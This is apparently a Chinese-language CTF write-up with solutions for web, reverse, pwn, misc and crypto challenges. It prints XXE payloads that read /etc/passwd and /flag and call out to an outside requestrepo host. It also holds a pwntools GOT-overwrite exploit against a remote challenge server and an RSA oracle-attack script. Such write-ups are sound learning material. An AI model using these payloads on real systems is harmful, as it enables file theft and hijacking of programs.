web-1
题目描述:只需一键,Flag就在你眼前!
Ctrl+U直接出
web-2
题目描述:小明做的网站看似很安全,但是它好像开启了某个不安全的配置
敏感目录扫描无果,手动排查,根据报错是java的后端(springboot)
环境出网,能解析xml,有没有回显不知道,xxe包的。
<?xml version='1.0' encoding="UTF-8"?>
<!DOCTYPE hacker[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % myurl SYSTEM "http://Jay17.6c48yi2g.requestrepo.com">
%myurl;
]>
<root>
1
</root>
之前做了java的xxe,留了payload:
来自这篇文章:https://github.com/bfengj/CTF/blob/main/Web/java/XXE/Java%E4%B8%AD%E7%9A%84XXE.md
<?xml version="1.0" ?>
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
<!ENTITY % expr 'aaa)>
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
<!ELEMENT aa (bb'>
%local_dtd;
]>
<message>any text</message>
啥都好,就是环境有点问题
重开环境
re-1
IDA打开,直接找string,找到关键提示Congratulations!等,追踪到函数,发现main函数入口
简单审一下,就是flag字符串和key进行了crypt2处理,继续追踪key,发现key是由key和key1两个变量经过crypt1处理得到
先逆key,追踪key和key1,得到值,写解密脚本
def initialize_key_stream(state, key_seed):
key_length = len(key_seed)
state[:] = range(256)
j = 0
for i in range(256):
j = (j + state[i] + key_seed[i % key_length]) % 256
state[i], state[j] = state[j], state[i]
def encrypt_decrypt(state, data):
i = 0
j = 0
result = bytearray(data)
for idx in range(len(data)):
i = (i + 1) % 256
j = (j + state[i]) % 256
state[i], state[j] = state[j], state[i]
key_stream_byte = state[(state[i] + state[j]) % 256]
result[idx] ^= key_stream_byte
return result
def process_data(data, key_seed):
state = list(range(256))
initialize_key_stream(state, key_seed)
processed_data = encrypt_decrypt(state, data)
return processed_data
key_seed = b"keykey"
data = b"ban_debug!"
encrypted_data = process_data(data, key_seed)
print("Encrypted key:", encrypted_data)
得到key:b’i\rZ\xb2@\xea\x19?/j’ 解密cipher 脚本如下
def initialize_key_stream(state, key):
key_length = len(key)
for i in range(256):
state[i] = i
j = 0
for i in range(256):
j = (j + state[i] + key[i % key_length]) % 256
state[i], state[j] = state[j], state[i]
def encrypt_data(state, data):
i = 0
j = 0
encrypted_data = bytearray(data)
for index in range(len(data)):
i = (i + 1) % 256
j = (j + state[i]) % 256
state[i], state[j] = state[j], state[i]
key_stream_byte = state[(state[i] + state[j]) % 256]
encrypted_data[index] = (encrypted_data[index] - key_stream_byte) % 256
return encrypted_data
def decrypt_data(state, ciphertext):
i = 0
j = 0
decrypted_data = bytearray(ciphertext)
for index in range(len(ciphertext)):
i = (i + 1) % 256
j = (j + state[i]) % 256
state[i], state[j] = state[j], state[i]
key_stream_byte = state[(state[i] + state[j]) % 256]
decrypted_data[index] = (decrypted_data[index] + key_stream_byte) % 256
return decrypted_data
key = b'i\rZ\xb2@\xea\x19?/j'
ciphertext = bytes([
0x4e, 0x47, 0x38, 0x47, 0x62, 0x0a,
0x79, 0x6a, 0x03, 0x66, 0xc0, 0x69,
0x8d, 0x1c, 0x84, 0x0f, 0x54, 0x4a,
0x3b, 0x08, 0xe3, 0x30, 0x4f, 0xb9,
0x6c, 0xab, 0x36, 0x24, 0x52, 0x81,
0xcf
])
state = list(range(256))
initialize_key_stream(state, key)
decrypted_data = decrypt_data(state, ciphertext)
print("Decrypted flag:", decrypted_data.decode())
re-2
先用010editror修改CTF为UPX
然后用upx4.2.3脱壳
然后下完断点后输入27个字符动调查看v4找到flag
pwn-1
name能覆盖到password1的指针 修改其使其指向__isoc99_scanf的got然后在输入password1时将其篡改为提供的后门地址即可
from pwn import *
context.log_level="debug"
elf=ELF("./Wal1et")
io=remote("47.100.12.80",30786)
#io=process("./Wal1et")
#io.recvuntil("2.EXIT")
io.sendline("1")
io.recvuntil("Show me your name :")
printf_got=elf.got["printf"]
__isoc99_scanf_got=elf.got["__isoc99_scanf"]
print(hex(printf_got))
io.sendline("aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaab"+p32(__isoc99_scanf_got))
#gdb.attach(io)
#pause()
io.recvuntil("password :")
io.sendline(str(0x804872A))
io.interactive()
misc-1
png打开,一眼像素有问题,stegsolve嗦一下,发现只有RGB的第七个通道有数据块并且部分黑,直接过滤7通道,得到一堆hex,hex转码
得到隐藏数据
搜一下发现是日语歌,发现前面有空的字符,连起来就是key的提示
直接搜这个解密网站 https://sekao.net/pixeljihad/ 解密后得到flag
crypto-1
import websocket
import json
from binascii import *
from Crypto.Util.number import *
url1="ws://101.132.170.0:31898"
ws=websocket.create_connection(url1)
t1=ws.recv()
# print(t1)
# ws.send(json.dumps({"cmd": "get_flag"}))
# ws.send("help")
def get_flag():
ws.send(json.dumps({"cmd": "get_flag"}))
tmp_result=str(ws.recv())
return bytes_to_long(unhexlify(tmp_result))
def dec(data):
ws.send(json.dumps({"cmd": "dec", "data": hex(data)[2:]}))
return ws.recv()
def enc(data):
ws.send(json.dumps({"cmd": "enc", "data": hex(data)[2:]}))
return ws.recv()
c=get_flag()
print(f"c={c}")
e=65537
left,right=1,2**2048
while left<right:
mid=(left+right)>>1
result=enc(mid)
if "args" in result:
right=mid-1
else:
left=mid
if right-left==1:
if "arg" in enc(right):
right=left
else:
left=right
print(left,right)
n=left+1
print(f"n={n}")
for i in range(2,3):
c_tmp=c*pow(i,e)%n
m=dec(c_tmp)
print(m)
result1=bytes_to_long(unhexlify(m))
if result1%2==0:
print(long_to_bytes(result1//2))
else:
print(long_to_bytes((result1+n)//2))
